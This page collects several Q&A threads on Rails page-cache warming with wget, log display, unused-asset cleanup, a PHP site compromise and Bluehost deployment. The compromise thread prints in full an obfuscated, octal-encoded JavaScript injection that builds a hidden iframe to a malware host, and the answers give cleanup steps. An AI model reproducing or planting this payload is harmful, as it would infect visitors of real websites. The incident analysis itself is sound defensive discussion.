"Warm Up Cache" on deployment - ruby-on-rails

I am wondering if anyone has any plugins or capistrano recipes that will "pre-heat" the page cache for a rails app by building all of the page cached html at the time the deployment is made, or locally before deployment happens.
I have some mostly static sites that do not change much, and would run faster if the html was already written, instead of requiring one visitor to hit the site.
Rather than create this myself (seems easy but it lowwwww priority) does it already exist?

You could use wget or another program to spider the site. In fact, this sort of scenario is mentioned as one of the uses in its manual page:
This option tells Wget to delete every single file it downloads, after having done so. It is useful for pre-fetching popular pages through a proxy, e.g.:
wget -r -nd --delete-after http://whatever.com/~popular/page/
The -r option is to retrieve recursively, and -nd to not create directories.

I use a rake task that looks like this to refresh my page cached sitemap every night:
require 'action_controller/integration'
ActionController::Base::expire_page("/sitemap.xml")
app = ActionController::Integration::Session.new
app.host = "notexample.com"
app.get("/sitemap.xml")
See http://gist.github.com/122738

I have set integration tests that confirm all of the main areas of the site are available (a few hundred pages in total). They don't do anything that changes data - just pull back the pages and forms.
I don't currently run them when I deploy my production instance, but now you mention it - it may actually be a good idea.
Another alternative would be to pull every page that appears in your sitemap (if you have one, which you probably should). It should be really easy to write a gem / rake script that does that.

Preloading this way -- generally, with a cron job to start at 10pm Pacific to and terminate at 6am Eastern time -- is a nice way to load-balance your site.
Check out the spider_test rails plugin for a simple way to do this in testing.
If you're going to use the wget above, add the --level=, --no-parent, --wait=SECONDS and --waitretry=SECONDS options to throttle your load, and you might as well log and capture the header responses for diagnosis or analysis (change the path from /tmp if desired):
wget -r --level=5 --no-parent --delete-after \
--wait=2 --waitretry=10 \
--server-response \
--append-output=/tmp/spidering-`date "+%Y%m%d"`.log
'http://whatever.com/~popular/page/'

Related

How to display log for Rails application?

I have a rails app and I would like to display the log in the app itself. This will allow administrators to see what changes were recently made without entering the console and using the file with the logs. All logs will be displayed in the application administration. How is it possible to implement and what kind of gems do I need to use?
You don't need a Gem.
Add a controller, read the logfiles and render the output in HTML.
Probably need to limit the number of lines you read. Also there might be different log files to chose from.
I don't think this is a good idea though. Log files are for finding errors and you should not need them in your day to day work, unless you manage ther server.
Also they might contain sensitive data (CC Numbers, Pwds, ...) and it might get complicated when you use multiple servers with local disks.
Probably better to look at dedicated tools for this and handle logs outside of your application.
Assuming that you have git associated with your application or git bash installed in your system.
For displaying log information for the development mode, migrate to your application folder in your console/terminal and type tail -f log/development.log

wget steam local time

When I wget any pages from Steam, the dates listed in them aren't my local time, which they are when I open them in a normal web browser instead. With wget, all the time stamps on the downloaded pages are several hours off, so it seems Steam-pages downloaded by wget assume the wrong time zone somehow.
Any idea how to fix this? I already tried
wget --header='Accept-language:xxx'
where xxx is a country code, but it didn't change the time zone/stamps, the only effect was that indeed the sites had a different language then.

Way to easily see which assets are not used?

I've inherited a rails app that had been used a few times over for various, different applications. In doing so, it looks as with each iteration, the developers simply copied in the new assets (images, javascript, etc) without starting fresh, so now I've got folders full of assets I'm sure aren't used.
I want to clean this up, as I'm responsible for the current iteration.
Is there a quick/easy way (a script perhaps) to filter out what is used and what isn't?
if you have very verbose logs try this script (taken from https://stackoverflow.com/a/14488684/1440599)
grep -Eo ‘GET /(.*(.gif|.jpg|.jpeg|.png|.css|.js))[ \?]’ [the-log].log > ~/assets.txt
of course, this doesn't take into account the time the assets are used (some may be obsolete) depending on how long the application has been logged so you'll have to take this into account

Found This Hack in my web server php files

How did i get them and what can i do to avoid this in the future?
#8f4d8e#
echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0145,0163,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0145,0163,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0141,0142,0163,0157,0154,0165,0164,0145,0147,0151,0146,0164,056,0143,0157,0155,057,0137,0160,0162,0151,0166,0141,0164,0145,057,0143,0154,0153,056,0160,0150,0160,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0145,0163,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0145,0163,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";
#/8f4d8e#
It seems to be redirecting to or injecting content from absolutegift dot com, a malware distributor. Somebody uploaded it to your server. This person (or bot) may have managed to get your password or he may have used an exploit. Change your passwords, make sure all user input (including uploads) is validated. Make sure you have a firewall running (I recommend csf) and scan your server for rootkits.
Contact your hosting provider and notify them of the issue. This is very important I've shutdown plenty of legit websites because they were compromised and the owner lost all their data.
If you are using a CMS such as Drupal, Wordpress, etc. etc. Make sure you upgrade and change admin passwords. If you have any plugins, make sure they are upgraded.
If you have no CMS, change your FTP & control panel passwords.
As for fixing the problem. If you are using a CMS, an in-place upgrade should replace all the files. If not, you can download all your files and use a word-processor like Notepad++ to do a find-and-replace throughout the directory. Also, your hosting provider might be able to restore from backup, or at least have some experience in fixing it.
To prevent it, don't use a CMS and learn some web security. Possibly hire a pentester.
this happened to me as well on an old site running Drupal 5. What I did is download the site and compared it with a clean copy of the codebase using meld (a graphical diff tool for linux).
I found that there was a file called god.php that was placed in one of the subdirectories and contained a php script which called R57. It's really scary what this thing can do.
Many of my files were infected with something like:
<?php
#8f4d8e#
...
#/8f4d8e#
?>
I cleaned this up manually a few times but kept being hacked until I removed the "god.php" file. I assume it might be called differently on your system.
If you have SSH access to the server go to your document root and search for all files containing the string:
grep -R "#8f4d8e#" .
You could also look for your version of the god.php file... look for traces of R57, for example by issuing:
grep -R "R57" .
Mine had a big ASCII art drawing of a bug at the beginning of the file.
I'm not sure how I got it but there were a list of bad things: un-updated very old version of Drupal, PHP4 with register_globals on, shared hosting (and probably a lousy company).
What I did is move the cleaned up site to another hosting company with PHP 5 and changed all passwords: drupal, ftp, mysql etc.

Where do I put the files I want to be displayed on my webpage on my webhost?

So I just finished the railstutorial.org twitter clone example and I want to put it online with my web hosting provider bluehost. Right now all I have is a file called sample_app with all of the rails stuff in it. And it works fine when I visit it on localhost:3000.
So I go to my bluehost file manager and there are 9 different folders, like public_html, public_ftp, rails_apps, www, tmp, access_logs, ect. Ive uploaded sample_app into this overall directory and into the public_html directory itself. But when I visit my website it just displays the html in a default.html file in the public_html directory.
What exactly is telling my hosting service to use public_html/default.html of any of the hundereds of different files and folders that are in other places on my server space? How do I find this thing and tell it to instead use sample_app or public_html/sample_app and then process everything in that to display my rails application?
Ive tried using bluehost support and they emailed me and said this would be accomplished by creating a symlink which links ~/rails_apps/NinetyNine/public to ~/public_html. I have no idea how to do this and the guides I find online all tell me to enter a series of commands. I dont know whether to do this in a terminal on my ubuntu system or some command prompt that bluehost provides. If it is at a terminal on my system which directory should I be in? any attempts I have made on my system have resulted in a no such file or directory error. When I asked bluehost to explain this they said that this was outside of the scope of their support and had to do with web development not hosting. It struck me as odd that they were unwilling to explain their own response to my problem but whatever.
If anyone of you could help me or point me in the right direction I would very much appreciate it. Thank you
What is telling my hosting service to use public_html/default.html ?
That would be a setting the web server configuration, probably Apache.
In Apache's case, the public_html directory is usually enabled with the
UserDir directive.
The default.html, is also an Apache configuration, DirectoryIndex.
Answering these because you asked: but typically, the global Apache configuration
is maintained by your provider (though you usually have some means to customize
parts of it).
Create the symlink from public_html to
They like gave you a command like (maybe not exactly)
$ ln -s ~/rails_apps/NinetyNine/public public_html
That is something that is intended to be run on your webhost, from a command prompt,
at the top of your home directory.
Look for docs on bluehost for finding out how to get SSH shell access.
That's where you'll enter the command.
More generally, however, you want to make sure you read the docs on how your
provider wants you to upload applications. Bluehost seems to have very nice
docs here:
https://my.bluehost.com/cgi/help/rails
Why your hosting provided said it was out of scope.
You're a beginner, and that's officially OK. Welcome!
But if you asked them a question like "Do I enter these commands on my computer
or yours", they are definitely going to politely respond that this out of scope;
meaning -- "We can't hand-hold you through this". If you ran a gas station and
someone asked you how to use the pump, you'd tell them. But if they then asked
"OK but do I put the gas in my car or yours?" you'd be reluctant to answer, because
there's some fundamental missing.
So how do I get more pointers, directions on this stuff?
Lots of approaches. By the far the best is to do as much stuff as you can on
your own computer. In your case, you could easily set up your own Apache
(Macs and Linux frequently ship with it - readily installable on Windows), and
that would clear up a lot of the conceptual issues.
Good luck!

Resources